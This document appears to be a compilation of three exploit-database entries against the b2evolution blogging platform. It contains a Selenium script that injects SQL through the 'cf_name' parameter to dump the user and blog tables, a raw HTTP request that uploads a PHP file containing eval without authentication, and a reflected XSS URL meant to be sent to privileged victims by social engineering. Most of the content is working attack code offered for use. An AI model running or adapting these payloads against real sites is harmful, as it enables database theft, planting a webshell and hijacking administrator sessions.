# Testing and Debugging: @nu11secur1ty
# Date: 05.06.2021
# Vendor: https://b2evolution.net/
# Link: https://b2evolution.net/downloads/7-2-2
# CVE: CVE-2021-28242
# Proof: https://streamable.com/x51kso
[+] Exploit Source:
#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-28242
from selenium import webdriver
import time
# Vendor: https://typo3.org/
website_link="
http://192.168.1.3/b2evolution/index.php?disp=login&redirect_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&return_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&source=menu%20link"
# enter your login username
username="admin"
# enter your login password
password="FvsDq7fmHvWF"
#enter the element for username input field
element_for_username="x"
#enter the element for password input field
element_for_password="q"
#enter the element for submit button
element_for_submit="login_action[login]"
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]
#browser = webdriver.Firefox() #uncomment this line,for chrome users
browser.get((website_link))
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()
# Exploit vulnerability MySQL obtain sensitive database information by
injecting SQL commands into the "cf_name" parameter
time.sleep(7)
# Receaving sensitive info for evo_users
browser.get(("http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT+*+FROM+%60evo_users%60+ORDER+BY+%60evo_&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections"))
time.sleep(7)
# Receaving sensitive info for evo_blogs
browser.get(("
http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_blogs`%20ORDER%20BY%20`evo_blogs`.`blog_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections"))
time.sleep(7)
# Receaving sensitive info for evo_section
browser.get(("http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_section`%20ORDER%20BY%20`evo_section`.`sec_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections"))
time.sleep(7)
browser.close()
print("At the time, of the exploit, you had to see information about the
tables...\n")
except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Sorry, your exploit is not working for some reasons...")
# Exploit Title: b2evolution6.8.2stable – Upload
# Date: 29/12/2016
# Exploit Author: Li Fei
# Vendor Homepage: http://b2evolution.net/
# Software Link: http://b2evolution.net/downloads/6-8-2-stable?download=6407
# Version: 6.8.2
# Tested on: win7 64bit
No need admin access for upload files and we can upload any file without bypass(.php,.exe,....)
1-goto http://localhost/b2evolution/index.php/a/extended-post
2- click on Browse botton and select you`re file
3- click on upload
Ceshi.php path is:
http://SiteName/ceshi.php
poc url:
POST /b2evolution/htsrv/comment_post.php HTTP/1.1
Poc header:
Host: localhost
Content-Length: 1054
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZ4hUYCjABZB7YSL
Referer: http://localhost/b2evolution/index.php/a/extended-post
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: session_b2evo=8323_COaAvLi6oU0LKIlMsoa207tOu4MRliDS; iCMS_USER_AUTH=93f92757UuFn7JIQa3nI%252Bk%252FF0s5elmm8KsIgZm%252F357CeOEhJUy7AsnKbPiZUa2eJTzmQx9lPUSaQcNVQtRiWJd%252BCBX0BQ4UpjoiTRBtkGujEc8rTtKoz3IGSFexrQEnmFfxKiL%252B1KR4nGq9wA88zDfJw6c1D7w7xeiYht2Iwo72Fcv8s6JjLcedy52QCOTHRPAFQ%252BdKcClUZz4vjvIvfZi5j6V4xQ1jpbnvV%252FMH6uyw7%252BL4Q41xqDKfgf1j7Sl36%252FGiXHwnij92A6nAMnxG78ZkUg5WG9PY5AtTyEMEtrHAuip7iPJbItdeuTSiTqwoIff%252BLuU4FM9nEldOYY2Jm9UD6XdgaXuyZBHhvb1v0buICmdQPX6rfrki9lZA; iCMS_userid=faf9c76a%252FQiEcyDoXBxmLMRDumokuULwqflVA%252FnfKJbcmsqFgw; iCMS_nickname=a693e7b1f4QEBL83uf0qmVI9BhIOCYq%252FTxa7NPwX8xobJpNm8bA; a8850_times=1; CNZZDATA80862620=cnzz_eid%3D1580835190-1482064117-http%253A%252F%252Flocalhost%252F%26ntime%3D1482064117; iweb_captcha=a95d2426cce76ef614NzA5ODI0NDUwOT5uZjFmY2RibDw4NGMyZjYxYzdmY2Bsa2ppdA; iweb_admin_role_name=6f99d0f079b6898180NDA1OTgwODg2NTk2PWA0Y2IwNGY9YWJgYWI3PmpgO2TrtofivafjrqbnmIXtkZg; iweb_admin_id=bef908b03b94700ce0ODA1MDEwMDAwMGowOTZlNzUwMTg2MDMxMmA3MWIxMzYx; iweb_admin_name=bef908b03b94700ce0ODA1MDEwMDAwMD8xbmUzMWFlOThiOzI3YjVmOjFgMjlhbWxpZg; iweb_admin_pwd=52f2f828c001b132f5NzAwMDc1NDcwMTg9YTE3NW8xYzA0M2E1YDdlYmY9YTllMjBnYmAyOjI5amEyOWNkYGU3NmUwNTdmNDVjPTA1ZQ
Connection: close
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="comment_rating"
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="g"
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="uploadfile[]"; filename="ceshi.php"
Content-Type: application/octet-stream
<?php
eval("echo'hello world';");
?>
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="submit_comment_post_19[save]"
Send comment
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="crumb_comment"
dXuthsKjMjhG2dnhADtzzOW414qV6Qky
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="comment_type"
comment
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="comment_item_ID"
19
------WebKitFormBoundarytZ4hUYCjABZB7YSL
Content-Disposition: form-data; name="redirect_to"
http://localhost/b2evolution/index.php/a/extended-post
------WebKitFormBoundarytZ4hUYCjABZB7YSL—
# Exploit Title: b2evolution 6.11.6 - 'tab3' Reflected XSS
# CVE: CVE-2020-22839
# Date: 10/02/2021
# Exploit Author: Nakul Ratti, Soham Bakore
# Vendor Homepage: https://b2evolution.net/
# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
# Version: 6.11.6
# Tested on: latest version of Chrome, Firefox on Windows and Linux
--------------------------Proof of Concept-----------------------
Steps to Reproduce:
1. Send the following URL http://HOST/evoadm.php?.ctrl=comments&filter=restore&tab3=123%22onmouseover=%22alert(document.domain)%22&blog=1&blog=1 to the logged in victim using any social engineering technique.
2. When an unsuspecting user with high privileges opens this URL, XSS will be triggered which will execute the malicious javascript payload in users browser.
3. The vulnerable parameter in this case is “tab3”.